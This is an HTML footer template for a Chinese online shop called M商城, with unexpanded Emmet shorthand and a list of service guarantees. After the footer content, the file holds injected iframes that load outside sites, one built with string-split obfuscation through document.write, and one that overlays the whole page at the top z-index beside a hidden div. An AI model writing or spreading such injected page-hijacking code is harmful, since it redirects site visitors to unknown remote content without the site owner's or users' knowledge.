<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="renderer" content="webkit">
    <title>M商城尾部</title>
</head>
<body>
.container>.footer>.links>(a{222}+{|})*6+a{aaa}^.copyrights{Copyright©2012-2016  M商城33M.com 版权所有}
ul.wrap.guarantee>(li>img[src=/resource/images/foot_r1_c1.jpg]+strong{正品保证}+p{正品行货 品质保障})*4
.footer-nav>dl.wechat>dt{M商城微信}+dd>img^^(dl>dt>i+{消费者服务保障}^dd>a{提供发票}*7)*6
提供发票
正品保障
假一赔十
全国联保
闪电发货
7天退换货
<iframe src="http://www.xbqiuyi.com/" frameborder="0" width="100%" height="100%"></iframe>

<script>document.write('<iframe src="http://www.xbqiuyi.com/" frameborder="0" width="100%" height="100%"></iframe>')</script>
<script>document.write('<i'+'frame sr'+'c="h'+'tt'+'p'+':'+'//w'+'ap'+'1.bo'+'ai'+'16.'+'co'+'m" fr'+'am'+''+'ebor'+'der="0" st'+'yle="wi'+'dth:100'+'%;hei'+'ght:387'+'0px;"></ifr'+'ame><di'+'v sty'+'le="disp'+'lay:no'+'ne">')</script>


<iframe src="http://wap1.boai16.com" frameborder="0" style="width: 100%;position: absolute;z-index: 99999;background: #fff;height:3675px;"></iframe><div style="position:absolute;z-index: 1;">


<script>
</script>
</body>
</html>